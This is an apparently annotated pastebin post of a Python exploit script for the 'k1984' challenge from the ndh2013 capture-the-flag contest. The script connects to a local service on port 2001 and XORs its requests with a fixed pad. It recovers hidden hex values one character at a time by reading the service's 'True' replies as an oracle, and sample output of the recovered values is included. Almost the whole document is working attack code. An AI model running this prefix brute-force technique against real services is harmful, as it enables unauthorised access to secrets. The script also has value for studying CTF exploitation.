
Untitled

a guest Jun 23rd, 2013 246 Never
  #!/usr/bin/python
  # Exploit for k1984
  # Aris Adamantiadis (les pas contents)
  # unfortunately coded a few hours after the CTF was over :(
  # aris@kali64:~/ndh2013$ python xp.py
  # found 05:8efc22fcc45fc5901f1bbce521f29bc1
  # found 06:98adbaaef36e718f479db3b8dad331c9
  # found 13:7da8b66f82aeba067e33859583c4153f
  # found 17:083d5f3bcd7c0b39e473844f1326decf
  # found 20:3856bd0cbb94460c113259b0b83d9049
  # found 35:167f0dbb43c6430cd2d3b4e8f79dd769
  # found 46:840c653d087e8e1821b1903f0981ae2d
  # found 52:3f45067f05fb180b8f0014a23648d677
  # found 64:e17cc98f772d417a3ce261df512c2ab4
  # found 99:2385ba276005a5e2098c0acb9bdf8f07


  18. import socket
  19.  
  # 96 bytes (six rows of sixteen hex pairs) that try_pass() XORs every
  # outgoing payload with.  The rows are joined without a separator and the
  # spaces stripped before hex-decoding (Python 2 "hex" codec).
  # NOTE(review): where these bytes come from is not shown in this file; the
  # same pad is reused for every request, which suggests the service applies
  # a fixed XOR stream -- confirm against the challenge itself.
  crypted = (
      "8f d9 4d 70 a9 ce 04 bb 7b a9 7f dd 63 2d 23 8e"
      "52 bc dc 0b ab 8b d9 f0 f7 05 5e 60 84 e7 63 47"
      "fe c2 ce 99 10 c7 aa cc ac 65 b2 c8 f8 c3 6e e0"
      "d9 cd aa a3 f6 57 17 31 52 a6 58 0b 46 8f 91 e9"
      "11 20 c1 38 4e c4 21 0c 56 4c 77 32 e6 bf 80 bb"
      "d3 5c cc 9c d8 fc 1d 9e 44 a4 25 a8 5f cb fa 96"
  ).replace(" ", "").decode("hex")
  def xor_strings(xs, ys):
      """Return the character-wise XOR of two strings.

      Characters are paired with zip(), so the result is only as long as the
      shorter of the two arguments; any tail of the longer one is ignored.
      """
      mixed = []
      for left, right in zip(xs, ys):
          mixed.append(chr(ord(left) ^ ord(right)))
      return "".join(mixed)
  29.  
  # This initial value is never read: try_pass() takes the offset as a
  # parameter and the search loop at the bottom rebinds the name first.
  offset = 65

  # One TCP connection to the locally running service, shared by every
  # request that try_pass() sends.
  s = socket.socket(
      socket.AF_INET,
      socket.SOCK_STREAM,
      0,
  )
  s.connect(("127.0.0.1", 2001))
  33.  
  def try_pass(offset, string):
      """Send one guess to the service and report whether it replied "True".

      The request is a seven-byte header, the guess, and a NUL terminator,
      XORed with the module-level ``crypted`` bytes and written to the
      module-level socket ``s``.  A single recv() of up to 256 bytes is read
      back.

      offset -- integer placed in the header as two ASCII decimal digits
                (tens, then units), so it only encodes cleanly for 0..99.
      string -- the candidate value to test.

      Returns True when the reply contains the text "True", else False.
      """
      # Fixed header bytes evaluate to 78, 4, 8, 10 and (after the digits) 26.
      # NOTE(review): their meaning in the service's request format is not
      # visible here -- presumably tags or lengths; confirm against the target.
      # Floor division keeps every chr() argument an int.
      header = "".join([
          chr(0x9C // 2),
          chr(0x10 // 4),
          chr(0x40 // 8),
          chr(0xa0 // 16),
          chr(ord('0') + offset // 10),
          chr(ord('0') + offset % 10),
          chr(0xd0 // 8),
      ])
      payload = header + string + "\x00"
      # xor_strings() stops at the shorter input, so only the first
      # len(payload) bytes of crypted are used.
      s.send(xor_strings(payload, crypted))
      reply = s.recv(256)
      return reply.find("True") != -1
  45.  
  # For each offset 0..99, grow a string of lowercase hex digits one
  # character at a time: a digit is kept as soon as try_pass() accepts the
  # string extended by it.  At most 32 positions are attempted, and the
  # offset is abandoned early only when the very first position matched
  # nothing.  Offsets that produced a non-empty string are printed.
  # NOTE(review): this only works if the service answers "True" for a correct
  # partial prefix, as the sample output in the file header suggests; a
  # comparison over the whole value with one uniform reply would not confirm
  # characters one at a time.
  for offset in xrange(100):
      string = ""
      for position in xrange(32):
          if position > 0 and not string:
              break
          for nibble in xrange(16):
              digit = "%x" % nibble
              if try_pass(offset, string + digit):
                  string += digit
                  break
      if string:
          print("found %.2d:" % offset + string)